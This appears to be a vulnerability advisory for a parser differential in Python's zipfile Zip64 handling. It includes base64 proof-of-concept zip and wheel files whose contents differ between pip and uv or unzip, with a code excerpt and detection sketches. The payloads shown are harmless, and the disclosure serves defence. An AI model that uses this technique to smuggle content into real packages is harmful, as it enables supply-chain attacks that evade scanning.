# Python – Zip64 Locator Offset Vulnerability
## Package
## Affected versions
## Patched versions
## Description
### Summary
It is possible to craft a zip file that, when parsed by Python’s `zipfile` implementation, yields different contents than it does with other common zip implementations. This works because Python ignores the offset stored in the Zip64 locator record and instead expects the Zip64 end-of-central-directory record to sit immediately before the locator. As a result, a single file can contain two Zip64 end-of-central-directory records: one pointed to by the offset in the Zip64 locator record, and another located immediately before the locator.
Exploitation requires user interaction. An attack using this technique relies on different zip parsing implementations being used at different points in the handling of the same zip file. For example, a Python wheel file may be processed by Python-based tooling at one stage and by “uv” at another.
### Severity
Moderate – This vulnerability can be leveraged to hide malicious content that evades detection.
### Proof of Concept
#### Single File Zip
The following base64-encoded string is a specially crafted zip file that serves as a simple proof of concept.
```
$ echo "UEsDBBQAAAAAAAAAIQBLlVV3CwAAAAsAAAALAAAAYm9yaW5nX2ZpbGVub3QgcHl0aG9uClBLAQIUAxQAAAAAAAAAIQBLlVV3CwAAAAsAAAALAAAAAAAAAAAAAAC0AQAAAABib3JpbmdfZmlsZVBLBgYsAAAAAAAAAC0ALQAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAA5AAAAAAAAADQAAAAAAAAAUEsDBBQAAAAAAAAAIQBh7IWUCgAAAAoAAAAHAAAAcHlfZmlsZWlzIHB5dGhvbgpQSwECFAMUAAAAAAAAACEAYeyFlAoAAAAKAAAABwAAAAAAAAAAAAAAtAGlAAAAcHlfZmlsZVBLBgYsAAAAAAAAAC0ALQAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAA1AAAAAAAAANQAAAAAAAAAUEsGBwAAAABtAAAAAAAAAAEAAABQSwUGAAAAAAEAAQA5AAAANAAAAAAA" | base64 -d > poc.zip
```
When extracted with Python, the archive yields a file called `py_file` with the contents “is python”.
When extracted with other zip implementations, it yields a file called `boring_file` with the contents “not python”.
Extracting with Python:
```
$ mkdir ~/py && cd ~/py
$ python3 -c "import zipfile; zipfile.ZipFile('../poc.zip').extractall()"
$ ls
py_file
$ cat py_file
is python
```
Extracting with unzip (InfoZip):
```
$ mkdir ~/unzip && cd ~/unzip
$ unzip ../poc.zip
Archive: ../poc.zip
extracting: boring_file
$ cat boring_file
not python
```
Implementations that output boring_file include:
- Go
- java.util.zip (seek and streaming)
- InfoZip (unzip)
- MiniZip (zlib)
- PHP
- zip + async_zip Rust crates (seek and streaming)
- Yauzl (npm)
- net.lingala.zip4j (Maven)
- libarchive (bsdunzip)
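To illustrate how a parser that honors the locator can arrive at a different file list, here is a minimal sketch that follows the offset stored in the zip64 locator and reads the file names from the central directory it finds there. The helper name `names_via_locator` is hypothetical. The sketch assumes a single-disk archive held in memory, no archive comment containing a record signature, and UTF-8 file names. It is not meant to represent how any of the implementations listed above is actually written.

```python
import struct

EOCD_SIG = b"PK\x05\x06"
LOCATOR_FMT = "<4sLQL"       # signature, disk number, EOCD64 offset, total disks
EOCD64_FMT = "<4sQ2H2L4Q"    # fixed part of the zip64 end-of-central-directory record
CDH_FMT = "<4s4B4HL2L5H2L"   # fixed part of a central directory file header
CDH_SIZE = struct.calcsize(CDH_FMT)  # 46


def names_via_locator(data: bytes) -> list[str]:
    """List file names by following the zip64 locator's offset (hypothetical helper)."""
    eocd_pos = data.rfind(EOCD_SIG)
    if eocd_pos < 0:
        raise ValueError("no end-of-central-directory record found")
    loc_pos = eocd_pos - struct.calcsize(LOCATOR_FMT)
    if loc_pos < 0:
        raise ValueError("no room for a zip64 locator record")
    sig, _diskno, reloff, _disks = struct.unpack_from(LOCATOR_FMT, data, loc_pos)
    if sig != b"PK\x06\x07":
        raise ValueError("no zip64 locator record found")

    # Trust the locator: read the zip64 EOCD record at the offset it names.
    eocd64 = struct.unpack_from(EOCD64_FMT, data, reloff)
    if eocd64[0] != b"PK\x06\x06":
        raise ValueError("locator does not point at a zip64 EOCD record")
    total_entries, cd_offset = eocd64[7], eocd64[9]

    # Walk the central directory that this record describes.
    names = []
    pos = cd_offset
    for _ in range(total_entries):
        header = struct.unpack_from(CDH_FMT, data, pos)
        if header[0] != b"PK\x01\x02":
            raise ValueError("bad central directory header")
        name_len, extra_len, comment_len = header[12:15]
        start = pos + CDH_SIZE
        # Simplification: decode as UTF-8 regardless of the header flags.
        names.append(data[start:start + name_len].decode("utf-8", "replace"))
        pos = start + name_len + extra_len + comment_len
    return names
```

Comparing the result with `zipfile.ZipFile(path).namelist()` is one way to spot an archive whose two views disagree.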
#### Wheel
The following base64-encoded string is a specially crafted wheel file that further demonstrates the flaw and a potential attack scenario.
```
$ echo "UEsDBBQAAAAAAAAAIQAi5N7ufAAAAHwAAAAlAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQU1ldGFkYXRhLVZlcnNpb246IDIuNApOYW1lOiBjYndoZWVsemlwNjQKVmVyc2lvbjogMC4wLjEKU3VtbWFyeTogTW9yZSBteXN0ZXJpZXMKQXV0aG9yLWVtYWlsOiBDYWxlYiA8Y2FsZWJicm93bkBnb29nbGUuY29tPgpQSwMEFAAAAAAAAAAhAN1AXn1kAAAAZAAAACIAAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL1dIRUVMV2hlZWwtVmVyc2lvbjogMS4wCkdlbmVyYXRvcjogZmxpdCAzLjEyLjAKUm9vdC1Jcy1QdXJlbGliOiB0cnVlClRhZzogcHkyLW5vbmUtYW55ClRhZzogcHkzLW5vbmUtYW55ClBLAwQUAAAAAAAAACEAXL6g5HABAABwAQAAIwAAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JEY2J3aGVlbHppcDY0L19faW5pdF9fLnB5LHNoYTI1Nj01NTU0ZWNiZTNmOTYyMjk4Mzc3NDE1NzdhZTJkMmYyODVmMTUwOTYxOThmYWViZGFhYTFmNDVmMTlkMzQ5YjQwLDIxCmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vV0hFRUwsc2hhMjU2PTBmMmI3YTQ4MTdkYTZhYzU4NDk1NGFkNDQ2NDkyNzU0NTAxOTBjNzQ5M2MzMTgzNzNkYTRmMzZiYjQ1MjZlNDYsMTAwCmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vTUVUQURBVEEsc2hhMjU2PTkwNDc2ZGUxNDFiYzc4NzA0YjQzY2I4NjBhNDIzYTFmYTA0ZmU1NTc1ODQ3MjZhNzUxMWQyYTk0MTkyYzlmOTMsMTI0CmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JELCwwMDAzNjhQSwMEFAAAAAAAAAAhAAnQ9UkVAAAAFQAAABgAAABjYndoZWVsemlwNjQvX19pbml0X18ucHlwcmludCgibWFnaWMiKQojINaEk5lQSwECFAMUAAAAAAAAACEAIuTe7nwAAAB8AAAAJQAAAAAAAAAAAAAAtAEAAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQVBLAQIUAxQAAAAAAAAAIQDdQF59ZAAAAGQAAAAiAAAAAAAAAAAAAAC0Ab8AAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL1dIRUVMUEsBAhQDFAAAAAAAAAAhAFy+oORwAQAAcAEAACMAAAAAAAAAAAAAALQBYwEAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JEUEsBAhQDFAAAAAAAAAAhAAnQ9UkVAAAAFQAAABgAAAAAAAAAAAAAALQBFAMAAGNid2hlZWx6aXA2NC9fX2luaXRfXy5weVBLBgaaAwAAAAAAAC0ALQAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAA6AQAAAAAAAF8DAAAAAAAAUEsDBBQAAAAAAAAAIQBcvqDkcAEAAHABAAAjAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkRjYndoZWVsemlwNjQvX19pbml0X18ucHksc2hhMjU2PTAxZjBhMDZjOTUxNTMyNGMxYzcwYmQ0YjQ3Yjg1NWRkNWRmMzg4ZTBlNmU4OWNlZDg4OGY2ODFmNGU3NTY3ZWYsMjEKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9XSEVFTCxzaGEyNTY9MGYyYjdhNDgxN2RhNmFjNTg0OTU0YWQ0NDY0OTI3NTQ1MDE5MGM3NDkzYzMxODM3M2RhNGYzNmJiNDUyNmU0NiwxMDAKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQSxzaGEyNTY9OTA0NzZkZTE0MWJjNzg3MDRiNDNjYjg2MGE0MjNhMWZhMDRmZTU1NzU4NDcyNmE3NTExZDJhOTQxOTJjOWY5MywxMjQKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkQsLDAwaRpgClBLAwQUAAAAAAAAACEACdD1SRUAAAAVAAAAGAAAAGNid2hlZWx6aXA2NC9fX2luaXRfXy5weXByaW50KCJtb3JlIG1hZ2ljISIpClBLAQIUAxQAAAAAAAAAIQAi5N7ufAAAAHwAAAAlAAAAAAAAAAAAAAC0AQAAAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL01FVEFEQVRBUEsBAhQDFAAAAAAAAAAhAN1AXn1kAAAAZAAAACIAAAAAAAAAAAAAALQBvwAAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vV0hFRUxQSwECFAMUAAAAAAAAACEAXL6g5HABAABwAQAAIwAAAAAAAAAAAAAAtAHRBAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkRQSwECFAMUAAAAAAAAACEACdD1SRUAAAAVAAAAGAAAAAAAAAAAAAAAtAGCBgAAY2J3aGVlbHppcDY0L19faW5pdF9fLnB5UEsGBiwAAAAAAAAALQAtAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAADoBAAAAAAAAzQYAAAAAAABQSwYHAAAAAJkEAAAAAAAAAQAAAFBLBQYAAAAABAAEADoBAABfAwAAAAA=" | base64 -d > cbwheelzip64-0.0.1-py2.py3-none-any.whl
```
Installing with uv:
```
$ mkdir uv && cd uv
$ uv venv env
$ . env/bin/activate
$ uv pip install ../cbwheelzip64-0.0.1-py2.py3-none-any.whl
Using Python 3.12.3 environment at: env
Resolved 1 package in 3ms
Installed 1 package in 1ms
 + cbwheelzip64==0.0.1 (from file:///home/calebbrown/cbwheelzip64-0.0.1-py2.py3-none-any.whl)
$ python3 -c 'import cbwheelzip64'
magic
```
Installing with pip:
```
$ mkdir py && cd py
$ python3 -m venv env
$ . env/bin/activate
$ pip install ../cbwheelzip64-0.0.1-py2.py3-none-any.whl
Processing /home/calebbrown/cbwheelzip64-0.0.1-py2.py3-none-any.whl
Installing collected packages: cbwheelzip64
Successfully installed cbwheelzip64-0.0.1
$ python3 -c 'import cbwheelzip64'
more magic!
```
### Further Analysis
```
# cpython/Lib/zipfile/__init__.py @ 6bf1c0ab3497b1b193812654bcdfd0c11b4192d8
# Simplified implementation, removing conditions and error handling.
def _EndRecData64(fpin, offset, endrec):
    fpin.seek(offset - sizeEndCentDir64Locator, 2)
    data = fpin.read(sizeEndCentDir64Locator)
    sig, diskno, reloff, disks = struct.unpack(structEndArchive64Locator, data)

    # Assume no 'zip64 extensible data'
    fpin.seek(offset - sizeEndCentDir64Locator - sizeEndCentDir64, 2)
    data = fpin.read(sizeEndCentDir64)
    # …
```
The above code snippet is the current logic used to read the zip64 end-of-central-directory record.
`sizeEndCentDir64Locator` and `sizeEndCentDir64` are both constants computed with `struct.calcsize` when the module is imported.
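As a rough illustration, the sizes can be reproduced with the format strings below. They are written out here on the assumption that they match the `structEndArchive*` definitions in CPython's `zipfile` module; check the commit referenced above before relying on them.

```python
import struct

# Format strings assumed to mirror the definitions in CPython's zipfile module.
structEndArchive = "<4s4H2LH"          # end-of-central-directory record
structEndArchive64Locator = "<4sLQL"   # zip64 locator record
structEndArchive64 = "<4sQ2H2L4Q"      # zip64 end-of-central-directory record (fixed part)

sizeEndCentDir = struct.calcsize(structEndArchive)
sizeEndCentDir64Locator = struct.calcsize(structEndArchive64Locator)
sizeEndCentDir64 = struct.calcsize(structEndArchive64)

print(sizeEndCentDir, sizeEndCentDir64Locator, sizeEndCentDir64)  # 22 20 56
```

With these values, the second `seek` in the snippet lands a fixed 76 bytes (20 + 56) before the position passed in as `offset`, whatever the locator says.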
When reading the zip64 end-of-central-directory record, the offset stored in the zip64 locator record (`reloff`) is ignored entirely. Instead, the position of the record is calculated from the record size constants.
The comment “Assume no ‘zip64 extensible data’” suggests that this “fixed offset” behaviour is intentional, since reading the “zip64 extensible data” field would require treating the zip64 end-of-central-directory record as variable-sized.
However, by making this assumption, Python’s zip implementation differs from the majority of other implementations, which do use the offset from the zip64 locator record.
Finally, the assumption of no extensible data is not validated. `reloff` is not checked to ensure that it corresponds to the position of the zip64 end-of-central-directory record that is actually read. This means that `reloff` can point to a separate zip64 end-of-central-directory record that returns different content to the one read by Python.
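One way to validate the assumption would be to compare `reloff` with the position at which the fixed-size arithmetic expects the record. The sketch below does this for an archive held in memory. The helper name `locator_mismatch` is hypothetical, it ignores prepended data and archive comments, and it is not presented as the fix adopted by CPython.

```python
import struct

EOCD_SIG = b"PK\x05\x06"
LOCATOR_SIG = b"PK\x06\x07"
LOCATOR_FMT = "<4sLQL"                        # signature, disk number, reloff, total disks
LOCATOR_SIZE = struct.calcsize(LOCATOR_FMT)   # 20
EOCD64_SIZE = struct.calcsize("<4sQ2H2L4Q")   # 56, fixed part only


def locator_mismatch(data: bytes):
    """Return (reloff, assumed_pos) when they disagree, otherwise None.

    Hypothetical helper: assumes the archive starts at byte 0 of `data`
    and that the last EOCD signature found is the real one.
    """
    eocd_pos = data.rfind(EOCD_SIG)
    if eocd_pos < LOCATOR_SIZE:
        return None  # no EOCD record, or no room for a locator before it
    loc_pos = eocd_pos - LOCATOR_SIZE
    sig, _diskno, reloff, _disks = struct.unpack_from(LOCATOR_FMT, data, loc_pos)
    if sig != LOCATOR_SIG:
        return None  # not a zip64 archive
    # Position implied by the "no zip64 extensible data" assumption.
    assumed_pos = loc_pos - EOCD64_SIZE
    if reloff == assumed_pos:
        return None
    return (reloff, assumed_pos)
```

A non-`None` result means the locator points somewhere other than the record a fixed-offset reader would use. An archive that legitimately carries zip64 extensible data would also be flagged, so a stricter parser would need to decide whether to reject such files or to read the record at `reloff` instead.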
### Timeline
**Date reported**: 07/28/2025
**Date fixed**:
**Date disclosed**: 10/27/2026
